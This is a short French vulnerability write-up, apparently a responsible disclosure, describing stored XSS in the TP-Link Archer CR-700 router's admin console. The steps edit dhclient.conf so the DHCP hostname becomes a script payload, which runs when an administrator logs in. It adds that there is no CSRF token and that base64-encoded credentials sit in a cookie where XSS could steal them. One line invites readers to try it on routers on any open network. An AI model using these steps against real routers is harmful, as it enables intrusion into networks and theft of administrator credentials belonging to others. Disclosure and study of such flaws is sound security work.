
Exploitation du routeur TP-Link Archer CR-700. (Divulgation responsable à TP-Link)
Exploitation du routeur TP-Link Archer CR-700. (Divulgué de manière responsable à TP-Link)
Étape 1-> Sur votre machine Linux (Kali ou Ubuntu), tapez la commande suivante
gedit /etc/dhcp/dhclient.conf
Commentez la ligne ci-dessous #send host-name = gethostname();
Copiez-la sur la ligne en dessous et remplacez la fonction gethostname() par un script XSS comme ci-dessous.
send host-name = "<script>alert(5)</script>";
Étape 2 : Redémarrez votre système Linux afin que les modifications prennent effet.
Étape 3 : Envoyez une requête DHCP au routeur pour recevoir une adresse IP avec la commande ci-dessous. (Essayez ceci sur les routeurs de tout réseau ouvert qui utilise le TP-Link Archer CR-700)
dhclient -v -i wlan0
Lors de l'exécution de la commande ci-dessus, une requête DHCP est envoyée au routeur. Lors d'une requête DHCP, le nom d'hôte est envoyé, que nous avons forcé à être un script XSS <script>alert(5)</script>.
Étape 4 : Connectez-vous à la console d'administration.
Lors de la connexion, le script s'exécute.
Un autre problème que j'ai constaté sur le routeur est qu'il n'y avait pas de jeton CSRF. Le cookie défini par le routeur contient un nom d'utilisateur et un mot de passe encodés en base64 qui peuvent être volés à l'aide d'un script XSS.
Remarque : Toutes les informations ci-dessus ont été communiquées à TP-Link, qui a reproduit le problème et l'a transmis à son équipe R&D pour résoudre le problème.
Une URL vers le produit https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W